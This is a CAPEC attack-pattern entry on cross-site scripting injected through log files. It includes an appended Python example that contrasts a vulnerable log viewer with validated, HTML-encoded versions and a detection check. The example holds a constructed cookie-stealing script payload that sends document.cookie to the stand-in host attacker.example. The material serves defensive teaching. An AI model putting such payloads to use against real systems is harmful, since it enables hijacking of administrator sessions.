CAPEC-106: Cross Site Scripting through Log Files (Version 2.4)

Attack Pattern ID: 106
Abstraction: Standard
Status: Draft
Completeness: Complete
+ Description

Summary

An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin (web-based) administrative interface and the log data is not HTML encoded before being written to the page, the attacker's scripts stored in the log will be executed in the administrative interface, with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.

Attack Execution Flow

Explore
  1. Probe for log injection vulnerability:

    The attacker probes all user-controllable data inputs to the system for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there may not be a feedback event to indicate to the attacker that certain information is being logged.

    Outcomes

    ID  Type     Outcome Description
    1   Success  User-injected input shows up in the logs

    Security Controls

    ID  Type          Security Control Description
    1   Preventative  Apply appropriate input validation and filtering of user-controllable input before writing to logs
  2. Probe for cross-site scripting vulnerability:

    The attacker probes all user-controllable data inputs to the system for cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities may also exist in the log management portions of the application.

    Outcomes

    ID  Type     Outcome Description
    1   Success  Attacker-injected script is executed in the user's browser.

    Security Controls

    ID  Type          Security Control Description
    1   Preventative  HTML encode all log contents before displaying them in log management interfaces.
Experiment
  1. Confirm exploitability:

    Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action which will give an attacker an indication that the attack vector exists.

    Attack Step Techniques

    ID  Attack Step Technique Description                                                                                                                                              Environments
    1   The idea is to receive some sort of feedback event that confirms that an attack is succeeding. That is done with a simple script prior to crafting a possibly more complex script to launch an actual attack.  env-Web

    Outcomes

    ID  Type     Outcome Description
    1   Success  Expected script execution feedback event is observed.
Exploit
  1. Inject System Logs with Malicious Scripts:

    Create a malicious script to run in the administrator's web-based interface and inject it into the system's logs through one of the user-controlled fields that are being logged.

    Attack Step Techniques

    ID  Attack Step Technique Description                                                                                                                                                                                          Environments
    1   Tamper with the values of the vulnerable fields so that what gets logged contains the malicious script. Possibly trigger another event that makes it more likely that the injected log entries are viewed in the vulnerable UI as soon as possible.  env-Web
+ Attack Prerequisites
  • The system uses a web-based interface

  • The system does not cleanse / validate user-supplied data before writing it to logs

  • Information from logs is displayed in a web-based interface

  • The web-based log interface does not HTML output encode the log data prior to displaying it in the administrator console.

+ Typical Severity

High

+ Typical Likelihood of Exploit

Likelihood: Medium

+ Methods of Attack
  • Injection
+ Examples-Instances

Description

An attacker determines that a particular system uses a web-based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field. The script will steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as-is. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attacker's activity record, the malicious script is executed in the context of the administrator's browser, stealing the administrator's authentication cookie and forwarding it to the attacker. The attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely.

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

Requires the ability to write a simple script and try to inject it through various user-controlled fields in the system.

+ Resources Required

No specialized hardware is required

+ Probing Techniques

Description

Locate system screens for operations that are likely to be logged and use these as starting points for injection

+ Solutions and Mitigations

Cleanse all user-supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form.

Use proper HTML output encoding to neutralize potentially dangerous scripting characters in the log data (encode them as character references rather than stripping them) before displaying it in the administrative console.

If possible, disable script execution in the administrative interface (for example, by serving the log viewer with a restrictive Content Security Policy).
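As an added example that is not part of the CAPEC entry, the following Python models the chain described in the Attack Execution Flow and Examples-Instances above alongside the two mitigations: a handler that logs a user name as-is and a log viewer that concatenates log text into HTML, each beside its hardened form (allow-list validation before logging, HTML output encoding at display time), plus a small detective check over the stored lines. The user-name format, the event names, the host attacker.example and every log line are constructed for this example and belong to no real system.

```python
"""Added example (not part of the CAPEC entry): a log-file XSS chain and its defences.

Constructed, self-contained model of the pattern: a "create user" handler that
logs the user name, and a web-based log viewer an administrator opens later.
Host and field names are assumptions made for the example.
"""
import html
import re
from typing import Iterable, List

# Constructed payloads. PROBE is the cheap feedback script from the Experiment
# step; EXPLOIT is the cookie-stealing script from Examples-Instances, aimed at
# a hypothetical attacker-controlled host.
PROBE_USERNAME = "bob<script>alert(1)</script>"
EXPLOIT_USERNAME = (
    "bob<script>new Image().src='https://attacker.example/c?'"
    "+encodeURIComponent(document.cookie)</script>"
)

# Assumed naming rule for the user name field.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(username: str) -> bool:
    """Allow-list check. Anything outside the set, including '<', '>', quotes,
    CR and LF, is rejected rather than stripped, so the log never holds markup
    or forged line breaks."""
    return USERNAME_RE.fullmatch(username) is not None


def log_line_unsafe(event: str, username: str) -> str:
    """Prerequisite as stated on the page: user data is written to the log as-is."""
    return f"{event} name={username}"


def log_line_safe(event: str, username: str) -> str:
    """Mitigation 1: validate before logging; reject bad data instead of cleaning it."""
    if not is_valid_username(username):
        raise ValueError("user name contains characters outside the allowed set")
    return f"{event} name={username}"


def render_log_vulnerable(lines: Iterable[str]) -> str:
    """Vulnerable viewer: log text is concatenated straight into the page, so a
    <script> stored in the log becomes live markup when the admin opens it."""
    rows = "".join(f"<li>{line}</li>" for line in lines)
    return f'<ul id="log">{rows}</ul>'


def render_log_safe(lines: Iterable[str]) -> str:
    """Mitigation 2: HTML-encode every log line at output time. html.escape turns
    <, >, &, " and ' into character references, so the browser shows the script
    as text. This works even if the log already contains an injected payload."""
    rows = "".join(f"<li>{html.escape(line, quote=True)}</li>" for line in lines)
    return f'<ul id="log">{rows}</ul>'


def contains_live_script(page: str) -> bool:
    """True if the rendered page still contains an unencoded <script tag."""
    return "<script" in page.lower()


def suspicious_lines(lines: Iterable[str]) -> List[int]:
    """Detective check for responders: indexes of stored log lines that contain
    something that looks like an HTML tag, i.e. a probe or payload already landed."""
    tag = re.compile(r"<\s*/?\s*[a-zA-Z!]")
    return [i for i, line in enumerate(lines) if tag.search(line)]


# Constructed log as written by the vulnerable handler (timestamps made up).
CONSTRUCTED_LOG = [
    "2014-04-10T10:00:00Z " + log_line_unsafe("user.create", "alice"),
    "2014-04-10T10:00:05Z " + log_line_unsafe("user.create", PROBE_USERNAME),
    "2014-04-10T10:00:09Z " + log_line_unsafe("user.create", EXPLOIT_USERNAME),
]

if __name__ == "__main__":
    print("vulnerable viewer executes script:",
          contains_live_script(render_log_vulnerable(CONSTRUCTED_LOG)))
    print("encoding viewer executes script:  ",
          contains_live_script(render_log_safe(CONSTRUCTED_LOG)))
    print("suspicious stored lines:", suspicious_lines(CONSTRUCTED_LOG))
```

Two design points worth noting. Validation rejects rather than strips, because a stripped value silently changes what was submitted and a later reviewer cannot tell what the user actually sent. Output encoding is the control that still protects the administrator after the log has already been poisoned, which is why the page lists both: the first keeps the log clean, the second makes the viewer safe regardless of what the log contains.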

+ Attack Motivation-Consequences
Scope                                           Technical Impact                        Note
Confidentiality                                 Read application data
                                                Read files or directories
Confidentiality, Authorization, Access_Control  Gain privileges / assume identity
Confidentiality, Integrity, Availability        Execute unauthorized code or commands
                                                Run Arbitrary Code
Integrity                                       Modify memory
                                                Modify files or directories
                                                Modify application data
+ Relevant Security Requirements

HTML output encode all data prior to writing to an HTML page

Properly validate and cleanse/reject user supplied data before writing it to log files

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: Medium
+ Technical Context
Architectural Paradigms
Client-Server
n-Tier
SOA
Frameworks
All
Platforms
All
Languages
All
+ Content History
Submissions
Submitter          Organization   Date        Comments
Evgeny Lebanidze   Cigital, Inc   2009-01-12  Initial core pattern content
Modifications
Modifier            Organization           Date        Comments                                                                                 Source
Sean Barnum         Cigital Federal, Inc.  2009-04-20  Refinement of pattern content
CAPEC Content Team  The MITRE Corporation  2014-02-06  Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances  Internal

Page Last Updated: April 10, 2014